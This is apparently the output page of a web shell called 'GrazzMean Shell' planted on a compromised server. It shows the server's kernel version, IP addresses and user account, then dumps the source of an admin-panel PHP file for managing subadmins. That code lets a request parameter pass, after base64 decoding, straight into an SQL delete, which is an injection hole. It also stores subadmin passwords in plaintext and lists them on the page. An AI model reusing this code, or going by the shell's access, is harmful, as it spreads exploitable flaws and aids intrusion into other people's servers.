shell bypass 403

GrazzMean Shell

Uname: Linux server.thebazaar99.com 5.14.0-687.17.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Jun 22 07:21:26 EDT 2026 x86_64
Software: Apache
PHP version: 8.3.32 [ PHP INFO ] PHP os: Linux
Server Ip: 163.227.92.254
Your Ip: 216.73.217.24
User: gutlooks (1003) | Group: gutlooks (1005)
Safe Mode: OFF
Disable Function:
exec,passthru,shell_exec,system

name : subadmin.php
<?php
spl_autoload_register(function($class) {
   include("classess/".$class.".php");
});

$sqlfun = new sqlfunction();
$admin = new admin_login();

$admin->security_check();
$sid = $admin->call_session();
$getdate =$admin->getdates();
if($_SESSION['type'] == "subadmin")
    {
        header("Location:dashboard.php");
    }
ob_start();
?>
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <title>MKO</title>
  <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport">
  <!-- Bootstrap 3.3.7 -->
  <link rel="stylesheet" href="css/bootstrap.min.css">
  <!-- Font Awesome -->
  <link rel="stylesheet" href="css/font-awesome.min.css">
  <!-- Ionicons -->
  <!--<link rel="stylesheet" href="css/ionicons.min.css">-->
  <!-- Theme style -->
  <link rel="stylesheet" href="css/AdminLTE.min.css">
  <link rel="stylesheet" href="css/_all-skins.min.css">
  <link rel="stylesheet" href="css/style.css">
  <link rel="stylesheet" href="css/dataTables.bootstrap.min.css">
  <link rel="stylesheet" href="css/bootstrap-datepicker.min.css">
  <link rel="stylesheet" type="text/css" href="css/summernote.css">
 <script src="js/jquery.min.js"></script>
<script src="js/jquery-ui.min.js"></script>
<script src="js/bootstrap-datepicker.min.js"></script>
    <script type="text/javascript" src="js/summernote.min.js"></script>
  <!-- Google Font -->
  <link rel="stylesheet"
        href="https://fonts.googleapis.com/css?family=Source+Sans+Pro:300,400,600,700,300italic,400italic,600italic">
</head>
<body class="hold-transition skin-blue sidebar-mini">
<div class="wrapper">
<?php include('header.php');?>

<?php include('sidebar.php');?>

 <?php
 $succ = "";
if(isset($_GET['delid'])){
   $delid = base64_decode($_GET['delid']); 
  $cnd1  = "id='$delid'";
if($sqlfun->del_data("admin",$cnd1))
          { 
            $succ="<div class='alert alert-success hideee'><span><b>Success! </b>Deleted successfully</span><a href='#' class='close' data-dismiss='alert'>&times;</a></div>";
                        
                        header("refresh:0;url=subadmin.php");
          }
          else
          {
            $succ = "<p style = 'color:green;'>Something went wrong</p>";
          }  
   }
    

?>
    <!-- Content Wrapper. Contains page content -->
<div class="content-wrapper">
     <!-- Content Header (Page header) -->
    <div class="content-header">
      <h1>Add Subadmin</h1>
      <ol class="breadcrumb">
        <li><a href="#"><i class="fa fa-dashboard"></i> Home</a></li>
        <li class="active"> Subadmin</li>
      </ol>
    </div>

    <!-- Main content -->
    <div class="content body">
      <div class="row">
            <div class="col-md-12">
            <div class="box box-danger">
              <div class="box-header with-border">
                    <?php
                     if(isset($_POST['submit']))
                        {
                            $username = $_POST['username'];
                            $pass = $_POST['password'];
                        	$salt = "adeeb";
                        	$enc_pass = sha1($pass.$salt);
                        	$data6 = array("username"=>$username,"password"=>$enc_pass,"s_pwd"=>$pass,"type"=>"subadmin","status"=>"0","date"=>date("Y-m-d h:i:s"));
                            if($sqlfun->ins_data("admin",$data6))
                                {
                                     $succ="<div class='alert alert-success hideee'><span><b>Success! </b>Added successfully</span><a href='#' class='close' data-dismiss='alert'>&times;</a></div>";
                                     header("refresh:0;url=subadmin.php");
                                }
                        }
                        
                     

 ?>
                  <form   method="post" autocomplete ="off">
                         <div class="form-row">
                              <div class="col-md-3">
                                <div class="form-group">
                                  <label class="control-label"> Usernname</label>
                                  <input class="form-control "  name="username" value="" required type="text">
                                </div>
                            </div>
                             <div class="col-md-3">
                                <div class="form-group">
                                  <label class="control-label"> Password</label>
                                  <input class="form-control "  name="password" value="" required type="password">
                                </div>
                            </div>
                             
                            
                             <div class="col-md-3">
                                 <br> 
                                <button style="    margin-top: 8px;" type="submit" name="submit" class="btn btn-outline-primary"><i class="feather icon-file mr-2"></i> Add</button>
                            </div> 
                         </div>
                    </form>
              </div><!-- /.box-header -->
              <div class="box-body">
                  
                <table class="table table-bordered export_table">
                    <thead>
                        <tr>
                            <th>Sno</th>
                            <th>Username</th>
                            <th>password</th>
                              <th>Action</th> 
                        </tr>
                    </thead>
                   <tbody>
                       <?php
                       $cnd11 = "type = 'subadmin'";
                        $check11 = $sqlfun->fetchdata("admin",$cnd11);
                        if($check11->rowCount() > 0)
                        {
                            $sno = 1;
                        while($row11 = $check11->fetch(PDO::FETCH_OBJ))
                        {
                             $row_id = $row11->id;
                            $username = $row11->username;
                            $password = $row11->s_pwd;
                            
                            
                            
                       ?>
                        <tr>
                             <td><?=$sno++?></td>  
                            <td><?=$username?></td>  
                            <td><?=$password?></td>  
                            <td><a class="label bg-red" href="subadmin.php?delid=<?=base64_encode($row_id)?>" onclick="return confirm('Are you sure you want to delete it.')"><span class="fa fa-trash-o" aria-hidden="true"></span></a></td>
                        </tr>
                        <?php }}?>
                    </tbody>
                    
                </table>
                 
              </div><!-- /.box-body -->
            </div><!-- /.box -->
          </div><!-- /.col -->
      </div>
    </div>
      <!-- ============================================================= -->  </div><!-- /.content-wrapper -->

<?php include('footer.php');?>
 

</div><!-- ./wrapper -->

<!-- jQuery 3 -->

<!-- Bootstrap 3.3.7 -->
<script src="js/bootstrap.min.js"></script>
<!-- FastClick -->
<!--<script src="js/fastclick.min.js"></script>-->
<!-- AdminLTE App -->
<!--<script src="js/adminlte.min.js"></script>-->
<!-- SlimScroll -->
<script src="js/jquery.slimscroll.min.js"></script>
<!--<script src="https://google-code-prettify.googlecode.com/svn/loader/run_prettify.js"></script>-->
<!--<script src="js/docs.js"></script>-->
<script src="js/jquery.dataTables.min.js"></script>
<script src="js/dataTables.bootstrap.min.js"></script>
<!-- FastClick -->
<script src="js/fastclick.js"></script>
<!-- AdminLTE App -->
<script src="js/adminlte.min.js"></script>
<!--<script src="js/dashboard2.js"></script>-->
<!--<script src="js/demo.js"></script>-->
<script>
    $(document).ready(function () {
        $('.sidebar-menu').tree();
        $('.datatable').DataTable();
        $('#datatable1').DataTable();
        $('#datatable2').DataTable();
        $('#datatable3').DataTable();
         $('#editor1').summernote({ height: 200  });
//         $('#editor2').summernote({ height: 200  });
    });
     $(document).ready(function () {
        $('#datepicker').datepicker({
           autoclose: true,
           format:'dd-mm-yyyy'
   //        startDate:'1990-20-08',
   //        endDate:'1993-20-08'
       });
        $('#datepicker1').datepicker({  autoclose: true,  format:'dd-mm-yyyy' });
        $('#datepicker2').datepicker({  autoclose: true,  format:'dd-mm-yyyy' });
    });
   
</script>
 <script src="//cdn.rawgit.com/rainabba/jquery-table2excel/1.1.0/dist/jquery.table2excel.min.js"></script>

    <script type="text/javascript">
       $(document).ready(function(){
        $('#excel_button').click(function(){

          $('.export_table').table2excel({
              name: "Game Winning",
              filename: "Game Winning History",
              fileext: ".xls"
            });
          });
        });

    </script>
</body>
</html>

 
© 2026 GrazzMean